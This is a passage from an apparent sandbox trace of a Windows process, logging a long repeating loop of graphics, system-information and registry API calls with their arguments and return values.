(x1=0, y1=0, x2=0, y2=0) returned 0x104559b [0089.246] CombineRgn (hrgnDst=0x104559a, hrgnSrc1=0x570401dc, hrgnSrc2=0x590401d9, iMode=1) returned 1 [0089.247] CombineRgn (hrgnDst=0x104559b, hrgnSrc1=0x570401dc, hrgnSrc2=0x590401d9, iMode=4) returned 2 [0089.247] CreateSolidBrush (color=0xff) returned 0x2105599 [0089.247] CreateSolidBrush (color=0xff0000) returned 0x110559c [0089.247] DeleteObject (ho=0x110559c) returned 1 [0089.247] DeleteObject (ho=0x590401d9) returned 1 [0089.247] DeleteObject (ho=0x570401dc) returned 1 [0089.247] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.247] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.247] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.247] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.247] BeginPath (hdc=0x0) returned 0 [0089.247] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.247] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.247] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.247] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.247] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.247] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.247] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.247] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401d9 [0089.247] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401dc [0089.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104559d [0089.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104559e [0089.247] CombineRgn (hrgnDst=0x104559d, hrgnSrc1=0x5a0401d9, hrgnSrc2=0x580401dc, iMode=1) returned 1 [0089.247] CombineRgn (hrgnDst=0x104559e, hrgnSrc1=0x5a0401d9, hrgnSrc2=0x580401dc, iMode=4) returned 2 [0089.247] CreateSolidBrush (color=0xff) returned 0x210559c [0089.247] CreateSolidBrush (color=0xff0000) returned 0x110559f [0089.247] DeleteObject (ho=0x110559f) returned 1 [0089.247] DeleteObject (ho=0x580401dc) returned 1 [0089.247] DeleteObject (ho=0x5a0401d9) returned 1 [0089.247] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.247] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.247] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.247] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.247] BeginPath (hdc=0x0) returned 0 [0089.247] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.247] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.247] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.248] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.248] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401dc [0089.248] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401d9 [0089.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a0 [0089.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a1 [0089.248] CombineRgn (hrgnDst=0x10455a0, hrgnSrc1=0x590401dc, hrgnSrc2=0x5b0401d9, iMode=1) returned 1 [0089.248] CombineRgn (hrgnDst=0x10455a1, hrgnSrc1=0x590401dc, hrgnSrc2=0x5b0401d9, iMode=4) returned 2 [0089.248] CreateSolidBrush (color=0xff) returned 0x210559f [0089.248] CreateSolidBrush (color=0xff0000) returned 0x11055a2 [0089.248] DeleteObject (ho=0x11055a2) returned 1 [0089.248] DeleteObject (ho=0x5b0401d9) returned 1 [0089.248] DeleteObject (ho=0x590401dc) returned 1 [0089.248] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.248] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.248] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.248] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.248] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.248] BeginPath (hdc=0x0) returned 0 [0089.248] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.248] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.248] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.248] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.248] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.248] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401d9 [0089.248] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401dc [0089.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a3 [0089.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a4 [0089.249] CombineRgn (hrgnDst=0x10455a3, hrgnSrc1=0x5c0401d9, hrgnSrc2=0x5a0401dc, iMode=1) returned 1 [0089.249] CombineRgn (hrgnDst=0x10455a4, hrgnSrc1=0x5c0401d9, hrgnSrc2=0x5a0401dc, iMode=4) returned 2 [0089.249] CreateSolidBrush (color=0xff) returned 0x21055a2 [0089.249] CreateSolidBrush (color=0xff0000) returned 0x11055a5 [0089.249] DeleteObject (ho=0x11055a5) returned 1 [0089.249] DeleteObject (ho=0x5a0401dc) returned 1 [0089.249] DeleteObject (ho=0x5c0401d9) returned 1 [0089.249] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.249] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.249] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.249] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.249] BeginPath (hdc=0x0) returned 0 [0089.249] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.249] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.249] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.249] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.249] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.249] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.249] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.249] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401dc [0089.249] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401d9 [0089.249] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a6 [0089.249] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a7 [0089.249] CombineRgn (hrgnDst=0x10455a6, hrgnSrc1=0x5b0401dc, hrgnSrc2=0x5d0401d9, iMode=1) returned 1 [0089.249] CombineRgn (hrgnDst=0x10455a7, hrgnSrc1=0x5b0401dc, hrgnSrc2=0x5d0401d9, iMode=4) returned 2 [0089.249] CreateSolidBrush (color=0xff) returned 0x21055a5 [0089.249] CreateSolidBrush (color=0xff0000) returned 0x11055a8 [0089.249] DeleteObject (ho=0x11055a8) returned 1 [0089.249] DeleteObject (ho=0x5d0401d9) returned 1 [0089.249] DeleteObject (ho=0x5b0401dc) returned 1 [0089.249] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.249] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.249] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.249] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.249] BeginPath (hdc=0x0) returned 0 [0089.249] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.249] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.249] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.249] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.250] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.250] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401d9 [0089.250] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401dc [0089.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455a9 [0089.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455aa [0089.250] CombineRgn (hrgnDst=0x10455a9, hrgnSrc1=0x5e0401d9, hrgnSrc2=0x5c0401dc, iMode=1) returned 1 [0089.250] CombineRgn (hrgnDst=0x10455aa, hrgnSrc1=0x5e0401d9, hrgnSrc2=0x5c0401dc, iMode=4) returned 2 [0089.250] CreateSolidBrush (color=0xff) returned 0x21055a8 [0089.250] CreateSolidBrush (color=0xff0000) returned 0x11055ab [0089.250] DeleteObject (ho=0x11055ab) returned 1 [0089.250] DeleteObject (ho=0x5c0401dc) returned 1 [0089.250] DeleteObject (ho=0x5e0401d9) returned 1 [0089.250] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.250] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.250] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.250] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.250] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.250] BeginPath (hdc=0x0) returned 0 [0089.250] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.250] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.250] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.250] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.250] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.250] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401dc [0089.250] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401d9 [0089.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ac [0089.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ad [0089.250] CombineRgn (hrgnDst=0x10455ac, hrgnSrc1=0x5d0401dc, hrgnSrc2=0x5f0401d9, iMode=1) returned 1 [0089.250] CombineRgn (hrgnDst=0x10455ad, hrgnSrc1=0x5d0401dc, hrgnSrc2=0x5f0401d9, iMode=4) returned 2 [0089.250] CreateSolidBrush (color=0xff) returned 0x21055ab [0089.250] CreateSolidBrush (color=0xff0000) returned 0x11055ae [0089.251] DeleteObject (ho=0x11055ae) returned 1 [0089.251] DeleteObject (ho=0x5f0401d9) returned 1 [0089.251] DeleteObject (ho=0x5d0401dc) returned 1 [0089.251] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.251] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.251] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.251] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.251] BeginPath (hdc=0x0) returned 0 [0089.251] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.251] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.251] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.251] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.251] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401d9 [0089.251] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401dc [0089.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455af [0089.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b0 [0089.251] CombineRgn (hrgnDst=0x10455af, hrgnSrc1=0x600401d9, hrgnSrc2=0x5e0401dc, iMode=1) returned 1 [0089.251] CombineRgn (hrgnDst=0x10455b0, hrgnSrc1=0x600401d9, hrgnSrc2=0x5e0401dc, iMode=4) returned 2 [0089.251] CreateSolidBrush (color=0xff) returned 0x21055ae [0089.251] CreateSolidBrush (color=0xff0000) returned 0x11055b1 [0089.251] DeleteObject (ho=0x11055b1) returned 1 [0089.251] DeleteObject (ho=0x5e0401dc) returned 1 [0089.251] DeleteObject (ho=0x600401d9) returned 1 [0089.251] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.251] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.251] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.251] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.251] BeginPath (hdc=0x0) returned 0 [0089.251] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.251] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.251] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.252] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.252] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.252] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401dc [0089.252] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401d9 [0089.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b2 [0089.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b3 [0089.252] CombineRgn (hrgnDst=0x10455b2, hrgnSrc1=0x5f0401dc, hrgnSrc2=0x610401d9, iMode=1) returned 1 [0089.252] CombineRgn (hrgnDst=0x10455b3, hrgnSrc1=0x5f0401dc, hrgnSrc2=0x610401d9, iMode=4) returned 2 [0089.252] CreateSolidBrush (color=0xff) returned 0x21055b1 [0089.252] CreateSolidBrush (color=0xff0000) returned 0x11055b4 [0089.252] DeleteObject (ho=0x11055b4) returned 1 [0089.252] DeleteObject (ho=0x610401d9) returned 1 [0089.252] DeleteObject (ho=0x5f0401dc) returned 1 [0089.252] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.252] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.252] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.252] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.252] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.252] BeginPath (hdc=0x0) returned 0 [0089.252] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.252] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.252] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.252] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.252] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.252] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.252] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.252] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.252] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401d9 [0089.252] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401dc [0089.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b5 [0089.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b6 [0089.252] CombineRgn (hrgnDst=0x10455b5, hrgnSrc1=0x620401d9, hrgnSrc2=0x600401dc, iMode=1) returned 1 [0089.252] CombineRgn (hrgnDst=0x10455b6, hrgnSrc1=0x620401d9, hrgnSrc2=0x600401dc, iMode=4) returned 2 [0089.252] CreateSolidBrush (color=0xff) returned 0x21055b4 [0089.252] CreateSolidBrush (color=0xff0000) returned 0x11055b7 [0089.252] DeleteObject (ho=0x11055b7) returned 1 [0089.252] DeleteObject (ho=0x600401dc) returned 1 [0089.252] DeleteObject (ho=0x620401d9) returned 1 [0089.253] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.253] GetSystemInfo 